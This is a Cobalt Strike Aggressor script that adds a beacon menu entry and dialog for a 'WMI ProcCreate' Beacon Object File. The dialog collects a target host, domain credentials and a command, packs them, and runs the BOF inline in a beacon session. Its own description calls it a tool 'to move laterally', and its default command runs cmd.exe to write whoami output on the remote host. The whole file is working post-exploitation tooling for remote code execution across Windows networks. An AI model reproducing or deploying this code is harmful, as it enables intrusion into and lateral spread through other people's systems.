
sub callback {
	local('$bid $handle $data $args $IsCurrent $username $password $target $command $domain $parameters')
	println("Dialog was actioned. Button: $2 Values: $3");
	
	$target = $3['target'];
	$username = $3['username'];
	$password = $3['password'];
	$domain = $3['domain'];
	$command = $3['cmd'];
	$bid = $3['bid'];
	$parameters = $3['parameters'];

	$string1 = "\\\\";
	$string2 = "\\ROOT\\CIMV2";

	$target2 = $string1.$target.$string2;

	$whitespace = " ";

	$commandline = $command.$whitespace.$parameters;

	#Parse args
	if($username -eq ""){
#you want to use the current user	
	$IsCurrent = 0;
		
		} else {
		$IsCurrent = 1;
		}

		# Figure out Arch of session
		$barch = barch($bid);	
		
		#Read BOF
		$handle = openf(script_resource("ProcCreate. $+ $barch $+ .o"));
		$data   = readb($handle, -1);
		closef($handle);
		
		#pack args
		$args   = bof_pack($bid, "ZZZZZi", $target2, $domain, $username, $password, $commandline, $IsCurrent);
		
		#annoucement
		btask($bid, "Running WMI ProcCreate BOF PoC");
				
		#Execute it
		beacon_inline_execute($bid, $data, "go", $args);
	
}


sub OpenDcomDialog{
	$dialog = dialog("WMI ProcCreate BoF", %(bid => $1, target => "",username => "", password => "", cmd => "C:\\windows\\system32\\cmd.exe", parameters => "/c \"whoami > C:\\wmi2.txt\""), &callback);
		dialog_description($dialog, "BOF to move laterally using WMI Process Create. Currently all fields must be filled in.");
		drow_text($dialog, "target",  "Target:");
		drow_text($dialog, "domain", "Domain:");
		drow_text($dialog, "username", "Username:");
		drow_text($dialog, "password", "Password:");
		drow_text($dialog, "cmd", "Command:");
		drow_text($dialog, "parameters", "Parameters:");
		dbutton_action($dialog, "Launch");		
		dialog_show($dialog);
}



popup beacon_bottom {
	menu "WMI ProcCreate BOF" {
			item "WMI ProcCreate"{
				local('$bid');
	foreach $bid ($1) {
		OpenDcomDialog($bid);
	}

			}
		}	
	}
